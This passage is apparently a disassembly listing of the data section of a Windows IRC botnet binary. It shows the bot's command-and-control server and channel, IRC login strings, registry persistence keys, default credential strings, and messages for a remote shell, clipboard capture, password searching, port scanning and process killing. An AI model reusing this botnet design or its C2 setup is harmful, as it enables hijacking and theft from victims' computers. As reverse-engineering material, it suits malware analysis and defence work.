db 'ord policy requirement.)',0
align 10h
aTheGroupAlread db 'The group already exists.',0 ; DATA XREF: sub_40E4B7:loc_40E594�o
align 4
aTheUserAccount db 'The user account already exists.',0 ; DATA XREF: sub_40E4B7:loc_40E58D�o
align 10h
aTheOperationIs db 'The operation is allowed only on the primary domain controller of'
; DATA XREF: sub_40E4B7+CF�o
db ' the domain.',0
align 10h
aAGeneralFailur db 'A general failure occurred in the network hardware.',0
; DATA XREF: sub_40E4B7:loc_40E562�o
aLevelParameter db 'Level parameter is invalid.',0 ; DATA XREF: sub_40E4B7:loc_40E55B�o
aDeviceOrDirect db 'Device or directory does not exist.',0
; DATA XREF: sub_40E4B7:loc_40E554�o
aInvalidForRedi db 'Invalid for redirected resource.',0 ; DATA XREF: sub_40E4B7:loc_40E54A�o
align 4
aDuplicateShare db 'Duplicate share name.',0 ; DATA XREF: sub_40E4B7+89�o
align 10h
aTheNameIsInval db 'The name is invalid.',0 ; DATA XREF: sub_40E4B7:loc_40E524�o
align 4
aAccessDenied_ db 'Access denied.',0 ; DATA XREF: sub_40E4B7:loc_40E51A�o
align 4
aNotEnoughMemor db 'Not enough memory.',0 ; DATA XREF: sub_40E4B7:loc_40E510�o
align 4
aThisNetworkReq db 'This network request is not supported.',0
; DATA XREF: sub_40E4B7:loc_40E506�o
align 4
aServerNameNotF db 'Server name not found.',0 ; DATA XREF: sub_40E4B7:loc_40E4FC�o
align 4
aInvalidParamet db 'Invalid parameter.',0 ; DATA XREF: sub_40E4B7+3B�o
align 10h
dword_42F530 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40E5EB+AB�o
dd 2BBBB02h
aSServerSMessag db ' %s <Server: %S> <Message: %S>',0
dword_42F568 dd 7A026E02h, 201F6D1Fh, 74656E28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40E5EB+81�o
dd 2BBBB02h
aMessageSentSuc db ' Message sent successfully.',0
align 10h
dword_42F5A0 dd 1B58h ; DATA XREF: sub_40E6A9+3A3�r
; sub_40E6A9+456�r
dword_42F5A4 dd 0C8Bh ; DATA XREF: sub_40E6A9+4A2�r
dword_42F5A8 dd 30EAh ; DATA XREF: sub_40EE72:loc_414C0A�r
dword_42F5AC dd 18F4h ; DATA XREF: sub_407252+3B�r
; sub_40EE72+52E6�r
dword_42F5B0 dd 1BB0h ; DATA XREF: sub_407252:loc_407501�r
; sub_40EE72:loc_41424D�r
dword_42F5B4 dd 0A84h ; DATA XREF: sub_40EE72:loc_4143C3�r
dword_42F5B8 dd 1 ; DATA XREF: sub_40EE72+665�r
dword_42F5BC dd 1 ; DATA XREF: sub_40E6A9+13D�r
dword_42F5C0 dd 1 ; DATA XREF: sub_40AC42+C�r
; sub_40E6A9:loc_40E9D8�r
byte_42F5C4 db 2Eh ; DATA XREF: sub_40CFE3:loc_40CFEF�r
; sub_40EE72+B05�r ...
align 4
dword_42F5C8 dd 6 ; DATA XREF: sub_415996+2B�r
; sub_415996+51�r ...
dword_42F5CC dd 4 ; DATA XREF: sub_40EB92+78�r
; sub_40EE72+279�r ...
a8652 db '8652',0
align 4
aCool_0 db 'cool',0
align 10h
aMan db 'man',0
align 8
aAsn139 db 'asn139',0
align 10h
db 2 dup(0)
byte_42F5F2 db 1 ; DATA XREF: sub_40EE72:loc_413D44�r
; sub_40EE72+4EDC�o
aAsn445 db 'asn445',0
align 4
dd 100h, 3 dup(0)
aBotid db 'botid',0 ; DATA XREF: sub_40E6A9+5A�o
; sub_40EE72+3E40�o ...
align 4
aAbosal7Tool db 'ABOSAL7 tool',0 ; DATA XREF: sub_40EE72:loc_414E22�o
align 4
aCool db 'cool',0 ; DATA XREF: sub_40EE72+6129�o
; sub_40EE72+61F8�o
align 4
aSaber_ircqforu db 'saber.ircqforum.com',0 ; DATA XREF: sub_40E6A9+38E�o
; sub_40E6A9+447�o
aFaak db '#faak#',0 ; DATA XREF: sub_40E6A9+3AF�o
; sub_40E6A9+45D�o
align 4
aSaad_ db 'saad.',0 ; DATA XREF: sub_40E6A9+3C6�o
; sub_40E6A9+46F�o
align 10h
byte_42F650 db 73h ; DATA XREF: sub_40E6A9:loc_40EB2E�r
; sub_40E6A9+493�o
aAber_ircqforum db 'aber.ircqforum.com',0
aFaak_0 db '#faak#',0 ; DATA XREF: sub_40E6A9+4A9�o
align 4
aSaad__0 db 'saad.',0 ; DATA XREF: sub_40E6A9+4BB�o
align 4
byte_42F674 db 69h ; DATA XREF: sub_402B84+F�o
; sub_4030E8+81�o ...
db 6Ah, 78h, 69h
dd 72736272h, 78652E75h, 65h
dword_42F684 dd 65627663h, 6C642E69h, 6Ch ; DATA XREF: sub_4022C6+3D�o
aSystam13 db 'Systam13',0 ; DATA XREF: sub_40C1AE+E�o
align 4
aBot db '[bot]-',0 ; DATA XREF: sub_415996+12�o
align 4
aFirstswin_exe db 'firstswin.exe',0
align 4
aXi db '+xi',0 ; DATA XREF: sub_40EE72+6274�o
aF db '#f',0 ; DATA XREF: sub_40EE72:loc_4120EF�o
; sub_40EE72+50A2�o ...
align 4
aF_0 db '#f',0 ; DATA XREF: sub_40EE72+1F2F�o
align 10h
aF_1 db '#f',0 ; DATA XREF: sub_40EE72+1D75�o
align 4
off_42F6C4 dd offset a@admin_com ; DATA XREF: sub_40EE72:loc_414FEE�o
; "*@admin.com"
off_42F6C8 dd offset aH4ckerTool ; DATA XREF: sub_40EE72+8CF�r
; sub_40EE72+6198�o
; "h4cker tool"
aSoftwareMicr_0 db 'Software\Microsoft\Windows\CurrentVersion\Run',0
align 4
db 53h
aOftwareMicro_0 db 'oftware\Microsoft\Windows\CurrentVersion\RunServices',0
align 4
aSoftwareMicros db 'Software\Microsoft\OLE',0 ; DATA XREF: sub_415F88+28�o
; sub_4162AC+28�o
align 4
aSystemCurrentc db 'SYSTEM\CurrentControlSet\Control\Lsa',0 ; DATA XREF: sub_415F88+D4�o
; sub_4162AC+D4�o
align 4
dd offset aAdministrator ; "Administrator"
dd offset aDb2 ; "db2"
align 10h
dd offset byte_436EDC
dd offset byte_436EDC
dd offset aAdministrato_0 ; "ADMINISTRATOR"
dd offset byte_436EDC
dd 0
dword_42F794 dd 10h ; DATA XREF: sub_40BE75+72�w
; sub_40EE72+B6E�r ...
aAdministrato_0 db 'ADMINISTRATOR',0 ; DATA XREF: _2:0042F788�o
align 4
aDb2 db 'db2',0 ; DATA XREF: _2:0042F778�o
aH4ckerTool db 'h4cker tool',0 ; DATA XREF: _2:off_42F6C8�o
a@admin_com db '*@admin.com',0 ; DATA XREF: _2:off_42F6C4�o
dword_42F7C4 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40E6A9+352�o
dd 2BBBB02h, 6F422020h, 74732074h, 65747261h, 2E64h
dword_42F7EC dd 25207325h, 25222064h, 2273h ; DATA XREF: sub_40E6A9+280�o
dword_42F7F8 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EB92+F2�o
dd 2BBBB02h
aConnectedToS_ db ' Connected to %s.',0
align 4
aNickSUserS00S db 'NICK %s',0Dh,0Ah ; DATA XREF: sub_40ECFA+62�o
db 'USER %s 0 0 :%s',0Dh,0Ah,0
align 10h
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_40ECFA+35�o
align 4
aModeSS db 'MODE %s %s',0Dh,0Ah,0 ; DATA XREF: sub_40EE72+627C�o
align 4
aUserhostS db 'USERHOST %s',0Dh,0Ah,0 ; DATA XREF: sub_40EE72+6264�o
align 4
dword_42F86C dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+6257�o
dd 2BBBB02h
aUserSLoggedIn_ db ' User: %s logged in.',0
align 4
dword_42F89C dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+623A�o
dd 2BBBB02h
aAbosal7Accepte db ' ABOSAL7 accepted.',0
dword_42F8C8 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+61D9�o
dd 2BBBB02h
aFailedHostAuth db ' *Failed host auth by: (%s!%s).',0
align 4
dword_42F904 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+6172�o
dd 2BBBB02h
aFailedPassAuth db ' *Failed pass auth by: (%s!%s).',0
align 10h
aNoticeSYouVeBe db 'NOTICE %s :You',27h,'ve been logged.',0Dh,0Ah,0
; DATA XREF: sub_40EE72+6160�o
; sub_40EE72+61C7�o
align 4
aNoticeSNiceTry db 'NOTICE %s :Nice try, idiot. (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_40EE72+6149�o
; sub_40EE72+61B0�o
align 4
asc_42F98C: ; DATA XREF: sub_40EE72+6119�o
unicode 0, <~>,0
dword_42F990 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+60C9�o
dd 2BBBB02h
aRandomNickChan db ' Random nick change: %s',0
align 4
dword_42F9C4 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+6015�o
dd 2BBBB02h
aInvalidLoginSl db ' Invalid login slot number: %d.',0
align 10h
dword_42FA00 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+600A�o
dd 2BBBB02h
aNoUserLoggedIn db ' No user logged in at slot: %d.',0
align 4
dword_42FA3C dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+5FB5�o
dd 2BBBB02h, 73252020h, 0
unk_42FA5C db 2 ; DATA XREF: sub_40EE72+5F8B�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 65h, 63h
db 75h ; u
db 72h, 65h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aFailedToStar_6 db ' Failed to start secure thread, error: <%d>.',0
align 4
dword_42FAA8 dd 7A026E02h, 201F6D1Fh, 63657328h, 2E657275h, 1F6C1F70h
; DATA XREF: sub_40EE72+5F15�o
dd 2202967h, 2002BBBBh, 20732520h, 74737973h, 2E6D65h
aUnsecuring db 'Unsecuring',0 ; DATA XREF: sub_40EE72+5F0F�o
align 4
aSecuring db 'Securing',0 ; DATA XREF: sub_40EE72+5F08�o
align 4
aSec db 'sec',0 ; DATA XREF: sub_40EE72+5EAD�o
aSecure db 'secure',0 ; DATA XREF: sub_40EE72+5E9C�o
align 4
unk_42FAF4 db 2 ; DATA XREF: sub_40EE72+5E91�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 73h, 6Fh, 63h
db 6Bh ; k
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToStar_7 db 'Failed to start server thread, error: <%d>.',0
dword_42FB3C dd 69026602h, 6966646Eh, 1F651F6Ch, 2E2Eh ; DATA XREF: sub_40EE72+5D6F�o
dword_42FB4C dd 646E6946h, 6C696620h, 65h ; DATA XREF: sub_40EE72+5D6A�o
dword_42FB58 dd 72027002h, 1F631F6Fh, 2E2Eh ; DATA XREF: sub_40EE72+5D57�o
dword_42FB64 dd 636F7250h, 20737365h, 7473696Ch, 0 ; DATA XREF: sub_40EE72+5D52�o
dword_42FB74 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+5D1F�o
dd 2BBBB02h, 65522020h, 6E6E6F63h, 69746365h, 2E676Eh
aQuitReconnecti db 'QUIT :reconnecting',0Dh,0Ah,0 ; DATA XREF: sub_40EE72:loc_414B84�o
align 4
dword_42FBB4 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+5CFD�o
dd 2BBBB02h, 69442020h, 6E6F6373h, 7463656Eh, 2E676E69h
dd 0
aQuitDisconnect db 'QUIT :disconnecting',0Dh,0Ah,0 ; DATA XREF: sub_40EE72:loc_414B62�o
align 4
aQuitS db 'QUIT :%s',0Dh,0Ah,0 ; DATA XREF: sub_40EE72+5CC8�o
align 4
dword_42FC04 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+5C76�o
dd 2BBBB02h
aStatusReady_Bo db ' Status: Ready. Bot Uptime: %s.',0
align 10h
dword_42FC40 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+5C62�o
dd 2BBBB02h, 6F422020h, 44492074h, 7325203Ah, 2Eh
dword_42FC68 dd 7A026E02h, 201F6D1Fh, 72687428h, 73646165h, 6C1F702Eh
; DATA XREF: sub_40EE72+5C3D�o
dd 2029671Fh, 2BBBB02h
aFailedToStartL db ' Failed to start list thread, error: <%d>.',0
dword_42FCB0 dd 7A026E02h, 201F6D1Fh, 72687428h, 73646165h, 6C1F702Eh
; DATA XREF: sub_40EE72+5BD2�o
dd 2029671Fh, 2BBBB02h, 694C2020h, 74207473h, 61657268h
dd 2E7364h
dword_42FCDC dd 627573h ; DATA XREF: sub_40EE72+5BAC�o
dword_42FCE0 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+5B5D�o
dd 2BBBB02h, 6C412020h, 20736169h, 7473696Ch, 2Eh
dword_42FD08 dd 7A026E02h, 201F6D1Fh, 676F6C28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+5B42�o
dd 2BBBB02h
aFailedToStar_8 db ' Failed to start listing thread, error: <%d>.',0
align 10h
dword_42FD50 dd 7A026E02h, 201F6D1Fh, 676F6C28h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+5AD3�o
dd 2BBBB02h, 694C2020h, 6E697473h, 6F6C2067h, 2E67h
dword_42FD78 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+5A36�o
dd 2BBBB02h, 654E2020h, 726F7774h, 6E49206Bh, 2E6F66h
dword_42FDA0 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+5A04�o
dd 2BBBB02h, 79532020h, 6D657473h, 666E4920h, 2E6Fh
dword_42FDC8 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+59AF�o
dd 2BBBB02h, 65522020h, 69766F6Dh, 4220676Eh, 2E746Fh
unk_42FDF0 db 2 ; DATA XREF: sub_40EE72+599C�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToStar_9 db 'Failed to start listing thread, error: <%d>.',0
align 10h
dword_42FE40 dd 7A026E02h, 201F6D1Fh, 6F727028h, 73736563h, 702E7365h
; DATA XREF: sub_40EE72+592D�o
dd 671F6C1Fh, 0BB022029h, 202002BBh, 636F7250h, 73736563h
dd 73696C20h, 2E74h
aFull db 'full',0 ; DATA XREF: sub_40EE72+590D�o
align 4
unk_42FE78 db 2 ; DATA XREF: sub_40EE72+58B6�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aAlreadyRunning db 'Already running.',0
align 4
unk_42FEAC db 2 ; DATA XREF: sub_40EE72+5893�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 63h, 64h, 6Bh
db 65h ; e
db 79h, 73h, 2Eh
db 70h ; p
db 1Fh, 6Ch, 1Fh
db 67h ; g
db 29h, 20h, 2
db 0BBh ; »
db 0BBh, 2, 20h
aSearchComplete db ' Search completed.',0
align 4
dword_42FEDC dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+584A�o
dd 2BBBB02h, 70552020h, 656D6974h, 7325203Ah, 2Eh
dword_42FF04 dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72:loc_4145F9�o
dd 2BBBB02h
aRemoteShellRea db ' Remote shell ready.',0
align 4
dword_42FF34 dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+5780�o
dd 2BBBB02h
aCouldnTOpenRem db ' Couldn',27h,'t open remote shell.',0
align 4
dword_42FF6C dd 7A026E02h, 201F6D1Fh, 646D6328h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+5764�o
dd 2BBBB02h
aRemoteShellAlr db ' Remote shell already running.',0
dword_42FFA4 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+5746�o
dd 2BBBB02h, 65472020h, 6C432074h, 6F627069h, 2E647261h
dd 0
aClipboardData db '-[Clipboard Data]-',0 ; DATA XREF: sub_40EE72+5718�o
align 4
unk_42FFE4 db 2 ; DATA XREF: sub_40EE72:loc_41457A�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToFlushA db ' Failed to flush ARP cache.',0
align 10h
dword_430020 dd 7A026E02h, 201F6D1Fh, 756C6628h, 6E646873h, 1F702E73h
; DATA XREF: sub_40EE72+56ED�o
dd 29671F6Ch, 0BBBB0220h, 41202002h, 63205052h, 65686361h
dd 756C6620h, 64656873h
dword_430050 dd 2Eh ; DATA XREF: _2:00427B70�o
dword_430054 dd 7A026E02h, 201F6D1Fh ; DATA XREF: sub_40EE72:loc_41454F�o
unk_43005C db 28h ; ( ; DATA XREF: _2:off_427A0C�o
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToLoadDn db ' Failed to load dnsapi.dll.',0
align 10h
unk_430090 db 2 ; DATA XREF: sub_40EE72:loc_414548�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToFlushD db ' Failed to flush DNS cache.',0
align 4
unk_4300CC db 2 ; DATA XREF: sub_40EE72+56CF�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 6Ch, 75h
db 73h ; s
db 68h, 64h, 6Eh
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aDnsCacheFlushe db ' DNS cache flushed.',0
align 10h
dword_430100 dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_40EE72+565F�o
dd 2029671Fh, 2BBBB02h
aFailedToSta_10 db ' Failed to start server thread, error: <%d>.',0
align 4
dword_43014C dd 7A026E02h, 201F6D1Fh, 6F6C7228h, 646E6967h, 6C1F702Eh
; DATA XREF: sub_40EE72+55F4�o
dd 2029671Fh, 2BBBB02h
aServerListen_0 db ' Server listening on IP: %s:%d, Username: %s.',0
align 4
unk_430198 db 2 ; DATA XREF: sub_40EE72+5528�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 68h, 2 dup(74h)
db 70h ; p
db 64h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToSta_11 db 'Failed to start server thread, error: <%d>.',0
unk_4301E0 db 2 ; DATA XREF: sub_40EE72+53B2�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 74h, 66h, 74h
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_12 db ' Failed to start server thread, error: <%d>.',0
align 4
unk_430228 db 2 ; DATA XREF: sub_40EE72+5287�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 74h, 66h, 74h
db 70h ; p
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aAlreadyRunni_0 db ' Already running.',0
unk_430254 db 2 ; DATA XREF: sub_40EE72+5271�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_13 db ' Failed to start search thread, error: <%d>.',0
unk_4302A0 db 2 ; DATA XREF: sub_40EE72+5200�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 66h, 69h, 6Eh
db 64h ; d
db 70h, 61h, 73h
db 73h ; s
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSearchingForPa db ' Searching for password.',0
unk_4302D8 db 2 ; DATA XREF: sub_40EE72:loc_414039�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 2 dup(6Fh)
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aFailedToSta_14 db ' Failed to start scan, port is invalid.',0
align 4
unk_43031C db 2 ; DATA XREF: sub_40EE72+5108�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 72h, 2 dup(6Fh)
db 74h ; t
db 2Eh, 70h, 1Fh
db 6Ch ; l
db 1Fh, 67h, 29h
db 20h
db 2, 2 dup(0BBh)
db 2
aSPortScanStart db ' %s Port Scan started on %s:%d with a delay of %d seconds for %d'
db ' minutes using %d threads.',0
align 4
dword_430394 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+4EC8�o
dd 2BBBB02h
aNickChangedToS db ' Nick changed to: ',27h,'%s',27h,'.',0
align 4
dword_4303C8 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+4EAC�o
dd 2BBBB02h
aJoinedChannelS db ' Joined channel: ',27h,'%s',27h,'.',0
dword_4303F8 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+4E89�o
dd 2BBBB02h
aPartedChannelS db ' Parted channel: ',27h,'%s',27h,'.',0
dword_430428 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+4E6D�o
dd 2BBBB02h, 52492020h, 61522043h, 25203A77h, 2E73h
dword_430450 dd 7A026E02h, 201F6D1Fh, 72687428h, 73646165h, 6C1F702Eh
; DATA XREF: sub_40EE72:loc_413C5E�o
dd 2029671Fh, 2BBBB02h
aFailedToKillTh db ' Failed to kill thread: %s.',0
align 4
dword_43048C dd 7A026E02h, 201F6D1Fh, 72687428h, 73646165h, 6C1F702Eh
; DATA XREF: sub_40EE72+4DE5�o
dd 2029671Fh, 2BBBB02h
aKilledThreadS_ db ' Killed thread: %s.',0
align 10h
dword_4304C0 dd 7A026E02h, 201F6D1Fh, 72687428h, 73646165h, 6C1F702Eh
; DATA XREF: sub_40EE72:loc_413C11�o
dd 2029671Fh, 2BBBB02h
aNoActiveThread db ' No active threads found.',0
align 4
dword_4304F8 dd 7A026E02h, 201F6D1Fh, 72687428h, 73646165h, 6C1F702Eh
; DATA XREF: sub_40EE72+4D86�o
dd 2029671Fh, 2BBBB02h
aStoppedDThread db ' Stopped: %d thread(s).',0
align 10h
aAll db 'all',0 ; DATA XREF: sub_40EE72+4D6C�o
aQuitLater db 'QUIT :later',0Dh,0Ah,0 ; DATA XREF: sub_40EE72+4CE1�o
; sub_40EE72:loc_414B4C�o
align 4
dword_430544 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+4C68�o
dd 2BBBB02h
aPrefixChangedT db ' Prefix changed to: ',27h,'%c',27h,'.',0
align 4
unk_430578 db 3 ; DATA XREF: sub_40EE72:loc_413AC5�o
db 31h, 35h, 2Ch
db 31h ; 1
db 34h, 6Eh, 7Ah
db 6Dh ; m
db 20h, 3, 32h
db 2Eh ; .
db 2Eh, 20h, 3
db 31h ; 1
db 35h, 28h, 73h
db 68h ; h
db 65h, 2 dup(6Ch)
db 3
db 32h, 2Eh, 3
db 31h ; 1
db 35h, 6Dh, 6Fh
db 64h ; d
db 29h, 20h, 3
db 32h ; 2
db 0BBh, 3, 31h
a5CouldnTOpenFi db '5 Couldn',27h,'t open file: %s',0
align 4
unk_4305BC db 3 ; DATA XREF: sub_40EE72+4C49�o
db 31h, 35h, 2Ch
db 31h ; 1
db 34h, 6Eh, 7Ah
db 6Dh ; m
db 20h, 3, 32h
db 2Eh ; .
db 2Eh, 20h, 3
db 31h ; 1
db 35h, 28h, 73h
db 68h ; h
db 65h, 2 dup(6Ch)
db 3
db 32h, 2Eh, 3
db 31h ; 1
db 35h, 6Dh, 6Fh
db 64h ; d
db 29h, 20h, 3
db 32h ; 2
db 0BBh, 3, 31h
a5FileOpenedS db '5 File opened: %s',0
align 4
dword_4305F8 dd 7A026E02h, 201F6D1Fh, 63726928h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+4C29�o
dd 2BBBB02h
aServerChangedT db ' Server changed to: ',27h,'%s',27h,'.',0
align 4
dword_43062C dd 7A026E02h, 201F6D1Fh, 736E6428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72:loc_413A4F�o
dd 2BBBB02h
aCouldnTResol_0 db ' Couldn',27h,'t resolve hostname.',0
align 4
dword_430664 dd 7A026E02h, 201F6D1Fh, 736E6428h, 6C1F702Eh, 2029671Fh
; DATA XREF: sub_40EE72+4BB2�o
dd 2BBBB02h
aLookupSS_ db ' Lookup: %s -> %s.',0
unk_430690 db 2 ; DATA XREF: sub_40EE72:loc_4139F0�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToTermin db 'Failed to terminate process: %s',0
unk_4306D0 db 2 ; DATA XREF: sub_40EE72+4B74�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aProcessKilledS db 'Process killed: %s',0
align 4
unk_430704 db 2 ; DATA XREF: sub_40EE72:loc_413990�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aFailedToTerm_0 db 'Failed to terminate process ID: %s',0
align 4
unk_430748 db 2 ; DATA XREF: sub_40EE72+4B17�o
db 6Eh, 2, 7Ah
db 1Fh
db 6Dh, 1Fh, 20h
db 28h ; (
db 70h, 72h, 6Fh
db 63h ; c
db 65h, 2 dup(73h)
db 65h ; e
db 73h, 2Eh, 70h
db 1Fh
db 6Ch, 1Fh, 67h
db 29h ; )
db 20h, 2, 0BBh
db 0BBh ; »
db 2, 2 dup(20h)
aProcessKilledI db 'Process killed ID: %s',0
align 10h
